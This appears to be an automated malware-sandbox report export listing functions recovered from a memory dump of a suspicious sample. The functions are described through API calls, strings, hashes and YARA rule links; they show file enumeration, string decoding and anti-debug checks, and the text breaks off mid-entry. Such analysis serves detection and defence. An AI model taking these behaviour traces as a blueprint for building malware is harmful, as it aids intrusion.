Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00427AC2,00000000,?,00427CC4,?,?,00427AC2,?,00000004), ref: 0040A6F1
StrCmpCA.SHLWAPI(?,00427CC8), ref: 0040A73C
StrCmpCA.SHLWAPI(?,00427CCC), ref: 0040A756
StrCmpCA.SHLWAPI(?,01461E90,00000000,?,?,?,00427CD0,?,?,00427AC3), ref: 0040A7EB

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID:
API String ID: 2567437900-0
Opcode ID: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
Instruction ID: 2ea2fa0ab5ea545b4f28549334ef020faf7293f43af17f0994d5e3a1f08ac2fb
Opcode Fuzzy Hash: 417fddb4da55d50a135db98e9e85244356d3d6bf30ef5c3c0009510e01a1b6fd
Instruction Fuzzy Hash: 74D17170901248EACB10EBA5C9567DDBBB56F19304F50817EF945A32C2EB785B0CCBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAE0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 476fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00427AC6,?,?,00000011), ref: 0040AB53
StrCmpCA.SHLWAPI(?,00427CDC), ref: 0040ABDC
StrCmpCA.SHLWAPI(?,00427CE0), ref: 0040ABF6

Strings

$, xrefs: 0040B17F
\*.*, xrefs: 0040AB15

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstlstrcatlstrlen
String ID: $$\*.*
API String ID: 1618123633-2097405073
Opcode ID: 0cc1edbcae78364b21f5275de005326cfd3953f2af5b7e73045f999bcf4a2850
Instruction ID: 9d0a2c0e34ca1c445267cdbe06f0ab8ac968f316d4e9e0d5098bc12580de8a59
Opcode Fuzzy Hash: 0cc1edbcae78364b21f5275de005326cfd3953f2af5b7e73045f999bcf4a2850
Instruction Fuzzy Hash: 9E123E71805149EACB15EBA1C951BEEBB78AF29304F1041BEF50673182DF786B4CCA69

Uniqueness

Uniqueness Score: -1.00%

Function 19CF5940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b23806638c3fb679e5b810e48090a76fe3ccd35916a6ecf043e2add5852a78
Instruction ID: f5e0b39663409b01e83ee1831e929883ad674e745b3268f1d1d798bea9b5f05b
Opcode Fuzzy Hash: 02b23806638c3fb679e5b810e48090a76fe3ccd35916a6ecf043e2add5852a78
Instruction Fuzzy Hash: 3BC18A77E183814FF7409A18EC827FB7791EBA5310F9C052EE6D6872C2E125A645C782

Uniqueness

Uniqueness Score: -1.00%

Function 19C77810 Relevance: 10.9, APIs: 7, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566abde35f009b9fefa4645af7fec6b7ffe2fbf91250d9bb2db3003ae005cc0b
Instruction ID: 0b51ab96ae8f439327a1e953aa8d2e26711999eff45e6783ef1a06762de6cbf6
Opcode Fuzzy Hash: 566abde35f009b9fefa4645af7fec6b7ffe2fbf91250d9bb2db3003ae005cc0b
Instruction Fuzzy Hash: E1E12772904345AFD705DF35E881A2BB7E4BF45344F088A6DF8D9A7291E731E850CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CE51D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

, xrefs: 19CE5334
REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19CE5264

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: a7a646fe3eebe74ed00fb196890759e95fa865a555a05c482b4a266c461992a7
Instruction ID: 889887f7deda57ad429b3163c739f3b924060c5464200dd82fcb3f4b83f78359
Opcode Fuzzy Hash: a7a646fe3eebe74ed00fb196890759e95fa865a555a05c482b4a266c461992a7
Instruction Fuzzy Hash: 1841B175A00241AFDB01DF29DC80B5AB7E9FF98354F094528F989A7251E772E910CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041ED3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041ED4F
UnhandledExceptionFilter.KERNEL32(8*d), ref: 0041ED5A
GetCurrentProcess.KERNEL32(C0000409), ref: 0041ED76
TerminateProcess.KERNEL32(00000000), ref: 0041ED7D

Strings

8*d, xrefs: 0041ED55

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: 8*d
API String ID: 2579439406-4035773523
Opcode ID: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
Instruction ID: ba808b284e536fa33b035d48e41bedda3b5bfac0dfc64b2c7f60dbe603414694
Opcode Fuzzy Hash: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
Instruction Fuzzy Hash: 4521C0BC9003069FC721DF65ECA96847BB2FB0A318FA0242AF90887670E77455C18F59

Uniqueness

Uniqueness Score: -1.00%

Function 19C55C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: 62c8ffb002b5858ee3f062c14bf5c91a9bd38fc5e7d1748c6916290cf3ed8a54
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: E641E4B63143819FFB04DF14E884A66B7E4FFA8310F184469E8D2C7691D761F8548B54

Uniqueness

Uniqueness Score: -1.00%

Function 19CD9090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afeb2e6e82cd6ecec4d64ca137bf5bfb11963a446339ad59eed281d4bd306b46
Instruction ID: a59c47d5673acb16cd8feea2104e262ae3f6e357f8ea25d64bb2faf3f2325273
Opcode Fuzzy Hash: afeb2e6e82cd6ecec4d64ca137bf5bfb11963a446339ad59eed281d4bd306b46
Instruction Fuzzy Hash: 4D31E7397013019FD710CF18E885EA6B3F6FF84325B194579EA868B262DB22FC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409330 Relevance: 9.1, APIs: 6, Instructions: 98stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409359
lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
memcpy.MSVCRT ref: 004093F1
lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D
lstrcat.KERNEL32(00427AA7,00427AAE), ref: 0040944F

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
Instruction ID: adffa3e7da8eb43a5bcae6fb888e125dec844c82986ee0a6d8cae4d8ea5a37e5
Opcode Fuzzy Hash: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
Instruction Fuzzy Hash: 8131F575B04219ABCB00DB84EC46BEF7779EF85715F14407AFA08A6280D7745A048BEA

Uniqueness

Uniqueness Score: -1.00%

Function 19CC1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19CC2001

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: 027e6441c0a730bbf601fc709490ef51081518178ddf1428e655c3fa3ba21229
Instruction ID: 52dcb8342321c0e382b7e869141cbeceeb16fe98a90d7f542212bf147aab6999
Opcode Fuzzy Hash: 027e6441c0a730bbf601fc709490ef51081518178ddf1428e655c3fa3ba21229
Instruction Fuzzy Hash: 5621E476900205AFDB11AF69EC40F567BAAFF04354F488419F4C897191D772F860CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C71C50 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

RtreeMatchArg, xrefs: 19C71F83

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: RtreeMatchArg
API String ID: 0-1459067757
Opcode ID: 790208c96945a283d470a6caaa4cfb5bb78583ffd85e9808db312b7f586b5bb7
Instruction ID: ee4c942108d428cb2949acb00431a669a5284fd3e690bdc294057c45b3bb82cf
Opcode Fuzzy Hash: 790208c96945a283d470a6caaa4cfb5bb78583ffd85e9808db312b7f586b5bb7
Instruction Fuzzy Hash: 8A02F1759047428FC715CF24E881A1BBBF2BF89354F18852DE9C59B391E731E984CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00406F10 Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
Instruction ID: c5d6de6eb5c64771bd9390db4b19ad01a52cb4a27094bb8536fc16c2df0bce05
Opcode Fuzzy Hash: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
Instruction Fuzzy Hash: CF014F76340312BBE7204FA5AC55F56B7ACEF05B61F200022FB09EB2C0D7B5A8108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 19CE5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 19CE597E

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 9ac72c86f914ef627e486586083afa2657ae08d9a6661534c1086b134d96ea48
Instruction ID: 466a3dc34594a6ce0467073f00c941684345f3eba07ec2d1e1255822eb1c7910
Opcode Fuzzy Hash: 9ac72c86f914ef627e486586083afa2657ae08d9a6661534c1086b134d96ea48
Instruction Fuzzy Hash: 69117CB6600206BFDB109F58DC84F86BBADFF59324F049144F6489B291D7B6B5A4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 19CFD3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe4a69bcccdb957f8933b6963a13cfc5677a4a17138ee6d0ac34dc3b134068
Instruction ID: 8295d391368377f13c3a7ad6221ddabcf1a0f805bcaa19b4f7f760eaa828ac22
Opcode Fuzzy Hash: befe4a69bcccdb957f8933b6963a13cfc5677a4a17138ee6d0ac34dc3b134068
Instruction Fuzzy Hash: 01315BB5B10201AFE740DF69EC85B66B7E9FF48314F088528F999D3281E771F910CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 19CE55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
